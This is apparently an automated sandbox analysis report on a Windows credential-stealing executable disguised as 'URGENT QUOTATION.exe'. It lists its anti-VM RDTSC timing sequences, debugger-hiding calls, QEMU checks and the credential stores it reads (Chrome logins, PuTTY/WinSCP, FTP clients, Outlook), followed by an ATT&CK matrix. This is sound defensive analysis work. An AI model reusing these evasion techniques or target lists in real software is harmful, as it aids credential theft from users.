            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218526F push ebx; iretd 0_2_02185272
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186261 push ebx; iretd 0_2_02186262
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182A63 push ebx; iretd 0_2_02182A66
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218129D push ebx; iretd 0_2_0218129E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180297 push ebx; iretd 0_2_0218029A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180287 push ebx; iretd 0_2_0218028A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802B9 push ebx; iretd 0_2_021802BA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182AAF push ebx; iretd 0_2_02182AB2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802A3 push ebx; iretd 0_2_021802A6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184AA5 push ebx; iretd 0_2_02184AA6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852A5 push ebx; iretd 0_2_021852A6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021832DB push ebx; iretd 0_2_021832DE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802D7 push ebx; iretd 0_2_021802DA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021842C9 push ebx; iretd 0_2_021842CA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802CD push ebx; iretd 0_2_021802CE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852CD push ebx; iretd 0_2_021852CE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802C3 push ebx; iretd 0_2_021802C6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852F9 push ebx; iretd 0_2_021852FA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802F3 push ebx; iretd 0_2_021802F6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: URGENT QUOTATION.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor word ptr [eax+ebx], cx 0x0000000f cmp ebx, 0000033Dh 0x00000015 jnl 00007F270CB2D94Bh 0x00000017 add ebx, 02h 0x0000001a jmp 00007F270CB2D8FCh 0x0000001c jmp 00007F270CB2D946h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC rdtsc 0_2_021853EC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884Thread sleep count: 91 > 30Jump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeLast function: Thread delayed
            Source: URGENT QUOTATION.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?0_2_0218613D
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC rdtsc 0_2_021853EC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021830FC LdrInitializeThunk,0_2_021830FC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h]0_2_02182BF7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218182B mov eax, dword ptr fs:[00000030h]0_2_0218182B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h]0_2_021846D2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h]0_2_021846D7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h]0_2_02181F7A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h]0_2_02181F7D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218578B mov eax, dword ptr fs:[00000030h]0_2_0218578B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218578F mov eax, dword ptr fs:[00000030h]0_2_0218578F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857AE mov eax, dword ptr fs:[00000030h]0_2_021857AE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h]0_2_02181FAF
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h]0_2_021857C9
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h]0_2_021857E7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h]0_2_02181D7E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h]0_2_02184DA0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h]0_2_02184DA3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h]4_2_00564DA3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h]4_2_00564DA0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h]4_2_005646D7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h]4_2_005646D2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h]4_2_005657C9
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h]4_2_00562BF3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h]4_2_005657E7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h]4_2_00562BE1
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056578F mov eax, dword ptr fs:[00000030h]4_2_0056578F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056578B mov eax, dword ptr fs:[00000030h]4_2_0056578B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005657AE mov eax, dword ptr fs:[00000030h]4_2_005657AE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,4_2_0056216A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe' Jump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180701 cpuid 0_2_02180701
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping2Security Software Discovery621Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
